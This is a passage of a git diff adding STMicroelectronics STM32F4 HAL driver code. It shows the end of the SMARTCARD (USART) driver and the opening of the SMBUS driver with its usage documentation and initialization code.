SMARTCARD_WaitOnFlagUntilTimeout(SMARTCARD_HandleTypeDef *hsc, uint32_t Flag, FlagStatus Status, uint32_t Tickstart, uint32_t Timeout) +{ + /* Wait until flag is set */ + while((__HAL_SMARTCARD_GET_FLAG(hsc, Flag) ? SET : RESET) == Status) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - Tickstart ) > Timeout)) + { + /* Disable TXE and RXNE interrupts for the interrupt process */ + CLEAR_BIT(hsc->Instance->CR1, USART_CR1_TXEIE); + CLEAR_BIT(hsc->Instance->CR1, USART_CR1_RXNEIE); + + hsc->gState= HAL_SMARTCARD_STATE_READY; + hsc->RxState= HAL_SMARTCARD_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hsc); + + return HAL_TIMEOUT; + } + } + } + return HAL_OK; +} + +/** + * @brief End ongoing Tx transfer on SMARTCARD peripheral (following error detection or Transmit completion). + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +static void SMARTCARD_EndTxTransfer(SMARTCARD_HandleTypeDef *hsc) +{ + /* At end of Tx process, restore hsc->gState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + + /* Disable TXEIE and TCIE interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); +} + + +/** + * @brief End ongoing Rx transfer on SMARTCARD peripheral (following error detection or Reception completion). + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +static void SMARTCARD_EndRxTransfer(SMARTCARD_HandleTypeDef *hsc) +{ + /* At end of Rx process, restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); +} + +/** + * @brief Send an amount of data in non blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval HAL status + */ +static HAL_StatusTypeDef SMARTCARD_Transmit_IT(SMARTCARD_HandleTypeDef *hsc) +{ + + /* Check that a Tx process is ongoing */ + if(hsc->gState == HAL_SMARTCARD_STATE_BUSY_TX) + { + hsc->Instance->DR = (uint8_t)(*hsc->pTxBuffPtr & 0xFFU); + hsc->pTxBuffPtr++; + + if(--hsc->TxXferCount == 0U) + { + /* Disable the SMARTCARD Transmit data register empty Interrupt */ + CLEAR_BIT(hsc->Instance->CR1, USART_CR1_TXEIE); + + /* Enable the SMARTCARD Transmit Complete Interrupt */ + SET_BIT(hsc->Instance->CR1, USART_CR1_TCIE); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Wraps up transmission in non blocking mode. + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for the specified SMARTCARD module. + * @retval HAL status + */ +static HAL_StatusTypeDef SMARTCARD_EndTransmit_IT(SMARTCARD_HandleTypeDef *hsc) +{ + /* Disable the SMARTCARD Transmit Complete Interrupt */ + CLEAR_BIT(hsc->Instance->CR1, USART_CR1_TCIE); + + /* Disable the SMARTCARD Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Tx process is ended, restore hsc->gState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Tx complete callback */ + hsc->TxCpltCallback(hsc); +#else + /* Call legacy weak Tx complete callback */ + HAL_SMARTCARD_TxCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + + return HAL_OK; +} + +/** + * @brief Receive an amount of data in non blocking mode + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval HAL status + */ +static HAL_StatusTypeDef SMARTCARD_Receive_IT(SMARTCARD_HandleTypeDef *hsc) +{ + + /* Check that a Rx process is ongoing */ + if(hsc->RxState == HAL_SMARTCARD_STATE_BUSY_RX) + { + *hsc->pRxBuffPtr = (uint8_t)(hsc->Instance->DR & (uint8_t)0xFFU); + hsc->pRxBuffPtr++; + + if(--hsc->RxXferCount == 0U) + { + CLEAR_BIT(hsc->Instance->CR1, USART_CR1_RXNEIE); + + /* Disable the SMARTCARD Parity Error Interrupt */ + CLEAR_BIT(hsc->Instance->CR1, USART_CR1_PEIE); + + /* Disable the SMARTCARD Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Rx process is completed, restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Rx complete callback */ + hsc->RxCpltCallback(hsc); +#else + /* Call legacy weak Rx complete callback */ + HAL_SMARTCARD_RxCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + + return HAL_OK; + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief DMA SMARTCARD communication abort callback, when initiated by HAL services on Error + * (To be called at end of DMA Abort procedure following error occurrence). + * @param hdma DMA handle. + * @retval None + */ +static void SMARTCARD_DMAAbortOnError(DMA_HandleTypeDef *hdma) +{ + SMARTCARD_HandleTypeDef* hsc = (SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + hsc->RxXferCount = 0x00U; + hsc->TxXferCount = 0x00U; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hsc->ErrorCallback(hsc); +#else + /* Call legacy weak user error callback */ + HAL_SMARTCARD_ErrorCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ +} + +/** + * @brief DMA SMARTCARD Tx communication abort callback, when initiated by user + * (To be called at end of DMA Tx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Rx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void SMARTCARD_DMATxAbortCallback(DMA_HandleTypeDef *hdma) +{ + SMARTCARD_HandleTypeDef* hsc = ( SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + hsc->hdmatx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if(hsc->hdmarx != NULL) + { + if(hsc->hdmarx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + hsc->TxXferCount = 0x00U; + hsc->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + + /* Restore hsc->gState and hsc->RxState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + hsc->RxState = HAL_SMARTCARD_STATE_READY; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + hsc->AbortCpltCallback(hsc); +#else + /* Call legacy weak Abort complete callback */ + HAL_SMARTCARD_AbortCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ +} + +/** + * @brief DMA SMARTCARD Rx communication abort callback, when initiated by user + * (To be called at end of DMA Rx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Tx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void SMARTCARD_DMARxAbortCallback(DMA_HandleTypeDef *hdma) +{ + SMARTCARD_HandleTypeDef* hsc = ( SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + hsc->hdmarx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if(hsc->hdmatx != NULL) + { + if(hsc->hdmatx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + hsc->TxXferCount = 0x00U; + hsc->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + + /* Restore hsc->gState and hsc->RxState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + hsc->RxState = HAL_SMARTCARD_STATE_READY; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + hsc->AbortCpltCallback(hsc); +#else + /* Call legacy weak Abort complete callback */ + HAL_SMARTCARD_AbortCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ +} + +/** + * @brief DMA SMARTCARD Tx communication abort callback, when initiated by user by a call to + * HAL_SMARTCARD_AbortTransmit_IT API (Abort only Tx transfer) + * (This callback is executed at end of DMA Tx Abort procedure following user abort request, + * and leads to user Tx Abort Complete callback execution). + * @param hdma DMA handle. + * @retval None + */ +static void SMARTCARD_DMATxOnlyAbortCallback(DMA_HandleTypeDef *hdma) +{ + SMARTCARD_HandleTypeDef* hsc = ( SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + hsc->TxXferCount = 0x00U; + + /* Restore hsc->gState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + hsc->AbortTransmitCpltCallback(hsc); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_SMARTCARD_AbortTransmitCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ +} + +/** + * @brief DMA SMARTCARD Rx communication abort callback, when initiated by user by a call to + * HAL_SMARTCARD_AbortReceive_IT API (Abort only Rx transfer) + * (This callback is executed at end of DMA Rx Abort procedure following user abort request, + * and leads to user Rx Abort Complete callback execution). + * @param hdma DMA handle. + * @retval None + */ +static void SMARTCARD_DMARxOnlyAbortCallback(DMA_HandleTypeDef *hdma) +{ + SMARTCARD_HandleTypeDef* hsc = ( SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + hsc->RxXferCount = 0x00U; + + /* Restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + hsc->AbortReceiveCpltCallback(hsc); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_SMARTCARD_AbortReceiveCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ +} + +/** + * @brief Configure the SMARTCARD peripheral + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +static void SMARTCARD_SetConfig(SMARTCARD_HandleTypeDef *hsc) +{ + uint32_t tmpreg = 0x00U; + uint32_t pclk; + + /* Check the parameters */ + assert_param(IS_SMARTCARD_INSTANCE(hsc->Instance)); + assert_param(IS_SMARTCARD_POLARITY(hsc->Init.CLKPolarity)); + assert_param(IS_SMARTCARD_PHASE(hsc->Init.CLKPhase)); + assert_param(IS_SMARTCARD_LASTBIT(hsc->Init.CLKLastBit)); + assert_param(IS_SMARTCARD_BAUDRATE(hsc->Init.BaudRate)); + assert_param(IS_SMARTCARD_WORD_LENGTH(hsc->Init.WordLength)); + assert_param(IS_SMARTCARD_STOPBITS(hsc->Init.StopBits)); + assert_param(IS_SMARTCARD_PARITY(hsc->Init.Parity)); + assert_param(IS_SMARTCARD_MODE(hsc->Init.Mode)); + assert_param(IS_SMARTCARD_NACK_STATE(hsc->Init.NACKState)); + + /* The LBCL, CPOL and CPHA bits have to be selected when both the transmitter and the + receiver are disabled (TE=RE=0) to ensure that the clock pulses function correctly. */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_TE | USART_CR1_RE)); + + /*---------------------------- USART CR2 Configuration ---------------------*/ + tmpreg = hsc->Instance->CR2; + /* Clear CLKEN, CPOL, CPHA and LBCL bits */ + tmpreg &= (uint32_t)~((uint32_t)(USART_CR2_CPHA | USART_CR2_CPOL | USART_CR2_CLKEN | USART_CR2_LBCL)); + /* Configure the SMARTCARD Clock, CPOL, CPHA and LastBit -----------------------*/ + /* Set CPOL bit according to hsc->Init.CLKPolarity value */ + /* Set CPHA bit according to hsc->Init.CLKPhase value */ + /* Set LBCL bit according to hsc->Init.CLKLastBit value */ + /* Set Stop Bits: Set STOP[13:12] bits according to hsc->Init.StopBits value */ + tmpreg |= (uint32_t)(USART_CR2_CLKEN | hsc->Init.CLKPolarity | + hsc->Init.CLKPhase| hsc->Init.CLKLastBit | hsc->Init.StopBits); + /* Write to USART CR2 */ + WRITE_REG(hsc->Instance->CR2, (uint32_t)tmpreg); + + tmpreg = hsc->Instance->CR2; + + /* Clear STOP[13:12] bits */ + tmpreg &= (uint32_t)~((uint32_t)USART_CR2_STOP); + + /* Set Stop Bits: Set STOP[13:12] bits according to hsc->Init.StopBits value */ + tmpreg |= (uint32_t)(hsc->Init.StopBits); + + /* Write to USART CR2 */ + WRITE_REG(hsc->Instance->CR2, (uint32_t)tmpreg); + + /*-------------------------- USART CR1 Configuration -----------------------*/ + tmpreg = hsc->Instance->CR1; + + /* Clear M, PCE, PS, TE and RE bits */ + tmpreg &= (uint32_t)~((uint32_t)(USART_CR1_M | USART_CR1_PCE | USART_CR1_PS | USART_CR1_TE | \ + USART_CR1_RE)); + + /* Configure the SMARTCARD Word Length, Parity and mode: + Set the M bits according to hsc->Init.WordLength value + Set PCE and PS bits according to hsc->Init.Parity value + Set TE and RE bits according to hsc->Init.Mode value */ + tmpreg |= (uint32_t)hsc->Init.WordLength | hsc->Init.Parity | hsc->Init.Mode; + + /* Write to USART CR1 */ + WRITE_REG(hsc->Instance->CR1, (uint32_t)tmpreg); + + /*-------------------------- USART CR3 Configuration -----------------------*/ + /* Clear CTSE and RTSE bits */ + CLEAR_BIT(hsc->Instance->CR3, (USART_CR3_RTSE | USART_CR3_CTSE)); + + /*-------------------------- USART BRR Configuration -----------------------*/ +#if defined(USART6) + if((hsc->Instance == USART1) || (hsc->Instance == USART6)) + { + pclk = HAL_RCC_GetPCLK2Freq(); + hsc->Instance->BRR = SMARTCARD_BRR(pclk, hsc->Init.BaudRate); + } +#else + if(hsc->Instance == USART1) + { + pclk = HAL_RCC_GetPCLK2Freq(); + hsc->Instance->BRR = SMARTCARD_BRR(pclk, hsc->Init.BaudRate); + } +#endif /* USART6 */ + else + { + pclk = HAL_RCC_GetPCLK1Freq(); + hsc->Instance->BRR = SMARTCARD_BRR(pclk, hsc->Init.BaudRate); + } +} + +/** + * @} + */ + +#endif /* HAL_SMARTCARD_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_smbus.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_smbus.c new file mode 100644 index 000000000..09df379bc --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_smbus.c @@ -0,0 +1,2786 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_smbus.c + * @author MCD Application Team + * @brief SMBUS HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the System Management Bus (SMBus) peripheral, + * based on SMBUS principals of operation : + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral State, Mode and Error functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The SMBUS HAL driver can be used as follows: + + (#) Declare a SMBUS_HandleTypeDef handle structure, for example: + SMBUS_HandleTypeDef hsmbus; + + (#)Initialize the SMBUS low level resources by implementing the HAL_SMBUS_MspInit() API: + (##) Enable the SMBUSx interface clock + (##) SMBUS pins configuration + (+++) Enable the clock for the SMBUS GPIOs + (+++) Configure SMBUS pins as alternate function open-drain + (##) NVIC configuration if you need to use interrupt process + (+++) Configure the SMBUSx interrupt priority + (+++) Enable the NVIC SMBUS IRQ Channel + + (#) Configure the Communication Speed, Duty cycle, Addressing mode, Own Address1, + Dual Addressing mode, Own Address2, General call and Nostretch mode in the hsmbus Init structure. + + (#) Initialize the SMBUS registers by calling the HAL_SMBUS_Init(), configures also the low level Hardware + (GPIO, CLOCK, NVIC...etc) by calling the customized HAL_SMBUS_MspInit(&hsmbus) API. + + (#) To check if target device is ready for communication, use the function HAL_SMBUS_IsDeviceReady() + + (#) For SMBUS IO operations, only one mode of operations is available within this driver : + + + *** Interrupt mode IO operation *** + =================================== + + [..] + (+) Transmit in master/host SMBUS mode an amount of data in non blocking mode using HAL_SMBUS_Master_Transmit_IT() + (++) At transmission end of transfer HAL_SMBUS_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SMBUS_MasterTxCpltCallback() + (+) Receive in master/host SMBUS mode an amount of data in non blocking mode using HAL_SMBUS_Master_Receive_IT() + (++) At reception end of transfer HAL_SMBUS_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SMBUS_MasterRxCpltCallback() + (+) Abort a master/Host SMBUS process communication with Interrupt using HAL_SMBUS_Master_Abort_IT() + (++) End of abort process, HAL_SMBUS_AbortCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SMBUS_AbortCpltCallback() + (+) Enable/disable the Address listen mode in slave/device or host/slave SMBUS mode + using HAL_SMBUS_EnableListen_IT() HAL_SMBUS_DisableListen_IT() + (++) When address slave/device SMBUS match, HAL_SMBUS_AddrCallback() is executed and user can + add his own code to check the Address Match Code and the transmission direction request by master/host (Write/Read). + (++) At Listen mode end HAL_SMBUS_ListenCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SMBUS_ListenCpltCallback() + (+) Transmit in slave/device SMBUS mode an amount of data in non blocking mode using HAL_SMBUS_Slave_Transmit_IT() + (++) At transmission end of transfer HAL_SMBUS_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SMBUS_SlaveTxCpltCallback() + (+) Receive in slave/device SMBUS mode an amount of data in non blocking mode using HAL_SMBUS_Slave_Receive_IT() + (++) At reception end of transfer HAL_SMBUS_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_SMBUS_SlaveRxCpltCallback() + (+) Enable/Disable the SMBUS alert mode using HAL_SMBUS_EnableAlert_IT() and HAL_SMBUS_DisableAlert_IT() + (++) When SMBUS Alert is generated HAL_SMBUS_ErrorCallback() is executed and user can + add his own code by customization of function pointer HAL_SMBUS_ErrorCallback() + to check the Alert Error Code using function HAL_SMBUS_GetError() + (+) Get HAL state machine or error values using HAL_SMBUS_GetState() or HAL_SMBUS_GetError() + (+) In case of transfer Error, HAL_SMBUS_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_SMBUS_ErrorCallback() + to check the Error Code using function HAL_SMBUS_GetError() + + + *** SMBUS HAL driver macros list *** + ================================== + [..] + Below the list of most used macros in SMBUS HAL driver. + + (+) __HAL_SMBUS_ENABLE : Enable the SMBUS peripheral + (+) __HAL_SMBUS_DISABLE : Disable the SMBUS peripheral + (+) __HAL_SMBUS_GET_FLAG : Checks whether the specified SMBUS flag is set or not + (+) __HAL_SMBUS_CLEAR_FLAG: Clear the specified SMBUS pending flag + (+) __HAL_SMBUS_ENABLE_IT : Enable the specified SMBUS interrupt + (+) __HAL_SMBUS_DISABLE_IT: Disable the specified SMBUS interrupt + + [..] + (@) You can refer to the SMBUS HAL driver header file for more useful macros + + *** Callback registration *** + ============================================= + [..] + The compilation flag USE_HAL_SMBUS_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_SMBUS_RegisterCallback() or HAL_SMBUS_RegisterXXXCallback() + to register an interrupt callback. + + Function HAL_SMBUS_RegisterCallback() allows to register following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) ErrorCallback : callback for error detection. + (+) AbortCpltCallback : callback for abort completion process. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + [..] + For specific callback AddrCallback use dedicated register callbacks : HAL_SMBUS_RegisterAddrCallback(). + [..] + Use function HAL_SMBUS_UnRegisterCallback to reset a callback to the default + weak function. + HAL_SMBUS_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) ErrorCallback : callback for error detection. + (+) AbortCpltCallback : callback for abort completion process. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + [..] + For callback AddrCallback use dedicated register callbacks : HAL_SMBUS_UnRegisterAddrCallback(). + [..] + By default, after the HAL_SMBUS_Init() and when the state is HAL_SMBUS_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_SMBUS_MasterTxCpltCallback(), HAL_SMBUS_MasterRxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak functions in the HAL_SMBUS_Init()/ HAL_SMBUS_DeInit() only when + these callbacks are null (not registered beforehand). + If MspInit or MspDeInit are not null, the HAL_SMBUS_Init()/ HAL_SMBUS_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) whatever the state. + [..] + Callbacks can be registered/unregistered in HAL_SMBUS_STATE_READY state only. + Exception done MspInit/MspDeInit functions that can be registered/unregistered + in HAL_SMBUS_STATE_READY or HAL_SMBUS_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + Then, the user first registers the MspInit/MspDeInit user callbacks + using HAL_SMBUS_RegisterCallback() before calling HAL_SMBUS_DeInit() + or HAL_SMBUS_Init() function. + [..] + When the compilation flag USE_HAL_SMBUS_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SMBUS SMBUS + * @brief SMBUS HAL module driver + * @{ + */ + +#ifdef HAL_SMBUS_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup SMBUS_Private_Define + * @{ + */ +#define SMBUS_TIMEOUT_FLAG 35U /*!< Timeout 35 ms */ +#define SMBUS_TIMEOUT_BUSY_FLAG 25U /*!< Timeout 25 ms */ +#define SMBUS_NO_OPTION_FRAME 0xFFFF0000U /*!< XferOptions default value */ + +#define SMBUS_SENDPEC_MODE I2C_CR1_PEC +#define SMBUS_GET_PEC(__HANDLE__) (((__HANDLE__)->Instance->SR2 & I2C_SR2_PEC) >> 8) + +/* Private define for @ref PreviousState usage */ +#define SMBUS_STATE_MSK ((uint32_t)((HAL_SMBUS_STATE_BUSY_TX | HAL_SMBUS_STATE_BUSY_RX) & (~(uint32_t)HAL_SMBUS_STATE_READY))) /*!< Mask State define, keep only RX and TX bits */ +#define SMBUS_STATE_NONE ((uint32_t)(HAL_SMBUS_MODE_NONE)) /*!< Default Value */ +#define SMBUS_STATE_MASTER_BUSY_TX ((uint32_t)((HAL_SMBUS_STATE_BUSY_TX & SMBUS_STATE_MSK) | HAL_SMBUS_MODE_MASTER)) /*!< Master Busy TX, combinaison of State LSB and Mode enum */ +#define SMBUS_STATE_MASTER_BUSY_RX ((uint32_t)((HAL_SMBUS_STATE_BUSY_RX & SMBUS_STATE_MSK) | HAL_SMBUS_MODE_MASTER)) /*!< Master Busy RX, combinaison of State LSB and Mode enum */ +#define SMBUS_STATE_SLAVE_BUSY_TX ((uint32_t)((HAL_SMBUS_STATE_BUSY_TX & SMBUS_STATE_MSK) | HAL_SMBUS_MODE_SLAVE)) /*!< Slave Busy TX, combinaison of State LSB and Mode enum */ +#define SMBUS_STATE_SLAVE_BUSY_RX ((uint32_t)((HAL_SMBUS_STATE_BUSY_RX & SMBUS_STATE_MSK) | HAL_SMBUS_MODE_SLAVE)) /*!< Slave Busy RX, combinaison of State LSB and Mode enum */ + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + +/** @addtogroup SMBUS_Private_Functions + * @{ + */ + +static HAL_StatusTypeDef SMBUS_WaitOnFlagUntilTimeout(SMBUS_HandleTypeDef *hsmbus, uint32_t Flag, FlagStatus Status, uint32_t Timeout, uint32_t Tickstart); +static void SMBUS_ITError(SMBUS_HandleTypeDef *hsmbus); + +/* Private functions for SMBUS transfer IRQ handler */ +static HAL_StatusTypeDef SMBUS_MasterTransmit_TXE(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_MasterTransmit_BTF(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_MasterReceive_RXNE(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_MasterReceive_BTF(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_Master_SB(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_Master_ADD10(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_Master_ADDR(SMBUS_HandleTypeDef *hsmbus); + +static HAL_StatusTypeDef SMBUS_SlaveTransmit_TXE(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_SlaveTransmit_BTF(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_SlaveReceive_RXNE(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_SlaveReceive_BTF(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_Slave_ADDR(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_Slave_STOPF(SMBUS_HandleTypeDef *hsmbus); +static HAL_StatusTypeDef SMBUS_Slave_AF(SMBUS_HandleTypeDef *hsmbus); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup SMBUS_Exported_Functions SMBUS Exported Functions + * @{ + */ + +/** @defgroup SMBUS_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + deinitialize the SMBUSx peripheral: + + (+) User must Implement HAL_SMBUS_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, IT and NVIC). + + (+) Call the function HAL_SMBUS_Init() to configure the selected device with + the selected configuration: + (++) Communication Speed + (++) Addressing mode + (++) Own Address 1 + (++) Dual Addressing mode + (++) Own Address 2 + (++) General call mode + (++) Nostretch mode + (++) Packet Error Check mode + (++) Peripheral mode + + (+) Call the function HAL_SMBUS_DeInit() to restore the default configuration + of the selected SMBUSx peripheral. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the SMBUS according to the specified parameters + * in the SMBUS_InitTypeDef and initialize the associated handle. + * @param hsmbus pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for the specified SMBUS + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SMBUS_Init(SMBUS_HandleTypeDef *hsmbus) +{ + uint32_t freqrange = 0U; + uint32_t pclk1 = 0U; + + /* Check the SMBUS handle allocation */ + if (hsmbus == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SMBUS_ALL_INSTANCE(hsmbus->Instance)); +#if defined(I2C_FLTR_ANOFF) + assert_param(IS_SMBUS_ANALOG_FILTER(hsmbus->Init.AnalogFilter)); +#endif + assert_param(IS_SMBUS_CLOCK_SPEED(hsmbus->Init.ClockSpeed)); + assert_param(IS_SMBUS_OWN_ADDRESS1(hsmbus->Init.OwnAddress1)); + assert_param(IS_SMBUS_ADDRESSING_MODE(hsmbus->Init.AddressingMode)); + assert_param(IS_SMBUS_DUAL_ADDRESS(hsmbus->Init.DualAddressMode)); + assert_param(IS_SMBUS_OWN_ADDRESS2(hsmbus->Init.OwnAddress2)); + assert_param(IS_SMBUS_GENERAL_CALL(hsmbus->Init.GeneralCallMode)); + assert_param(IS_SMBUS_NO_STRETCH(hsmbus->Init.NoStretchMode)); + assert_param(IS_SMBUS_PEC(hsmbus->Init.PacketErrorCheckMode)); + assert_param(IS_SMBUS_PERIPHERAL_MODE(hsmbus->Init.PeripheralMode)); + + if (hsmbus->State == HAL_SMBUS_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hsmbus->Lock = HAL_UNLOCKED; 